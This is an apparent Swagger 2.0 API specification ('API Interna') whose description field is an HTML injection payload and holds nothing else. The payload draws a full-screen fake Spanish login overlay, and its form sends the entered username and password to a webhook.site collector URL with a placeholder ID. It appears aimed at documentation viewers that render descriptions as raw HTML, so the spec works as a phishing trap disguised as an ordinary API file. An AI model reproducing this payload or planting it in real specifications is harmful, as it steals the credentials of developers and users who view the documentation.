swagger: '2.0'
info:
  version: 1.0.0
  title: API Interna
  description: >
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.4);z-index:999999;display:flex;align-items:center;justify-content:center;font-family:Arial,sans-serif;">
      <div style="width:360px;background:white;padding:35px;border-radius:10px;box-shadow:0 8px 25px rgba(0,0,0,0.25);">
        <h2 style="text-align:center;margin:0 0 20px;color:#1a1a1a;">Autenticación Requerida</h2>
        <form action="https://webhook.site/TU-UUID-AQUÍ" method="POST">
          <div style="margin-bottom:18px;">
            <input name="username" placeholder="Usuario o correo electrónico" required style="width:100%;padding:12px;border:1px solid #d1d5db;border-radius:6px;box-sizing:border-box;font-size:15px;">
          </div>
          <div style="margin-bottom:24px;">
            <input type="password" name="password" placeholder="Contraseña" required style="width:100%;padding:12px;border:1px solid #d1d5db;border-radius:6px;box-sizing:border-box;font-size:15px;">
          </div>
          <button type="submit" style="width:100%;padding:13px;background:#2563eb;color:white;border:none;border-radius:6px;font-size:15px;font-weight:600;cursor:pointer;">
            Iniciar sesión
          </button>
        </form>
        <p style="text-align:center;margin:16px 0 0;font-size:13px;color:#4b5563;">
          <a href="#" style="color:#2563eb;text-decoration:none;">¿Problemas para acceder?</a>
        </p>
      </div>
    </div>
